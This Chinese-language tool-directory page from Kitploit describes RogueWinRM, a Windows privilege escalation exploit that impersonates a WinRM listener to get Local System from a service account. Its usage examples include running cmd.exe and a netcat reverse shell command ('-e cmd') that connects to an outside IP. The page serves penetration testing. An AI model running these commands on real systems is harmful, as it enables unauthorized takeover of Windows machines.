Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RogueWinRM — Windows 本地权限提升:从服务账户到系统 | Kitploit
工具/GitHubGitHub/antoniococo/roguewinrm
权限提升漏洞利用渗透测试
GitHubantoniococo/roguewinrm

RogueWinRM

Windows 本地权限提升:从服务账户到系统

查看仓库
96411226年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RogueWinRM

RogueWinRM 是一个本地权限提升漏洞利用工具,允许从服务账户(具有 SeImpersonatePrivilege 权限)提升到本地系统账户,前提是 WinRM 服务未运行(Win10 默认未运行,但 Windows Server 2019 并非如此)。

简而言之,它会在 5985 端口监听传入连接,伪装成一个真正的 WinRM 服务。
它仅是一个最小的 Web 服务器,会尝试与任何试图连接该端口的服务协商 NTLM 身份验证。
然后,BITS 服务(以 Local System 身份运行)被触发,并尝试向我们的恶意监听器进行身份验证。一旦成功完成身份验证,我们就能模拟 Local System 用户,并以该权限生成任意进程。

关于此漏洞的完整技术描述,请参考此链接 --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

使用方法

root@kitploit:~
RogueWinRM

必需参数:
-p <程序>: 要启动的程序

可选参数:
-a <参数>: 传递给程序的命令行参数(默认为 NULL)
-l <端口>: 监听端口(默认为 5985 WinRM)
-d : 启用调试输出来

示例

RogueWinRM

运行交互式 cmd:

root@kitploit:~
RogueWinRM.exe -p C:\windows\system32\cmd.exe

运行 nc 反向 shell:

root@kitploit:~
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

作者

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
下载工具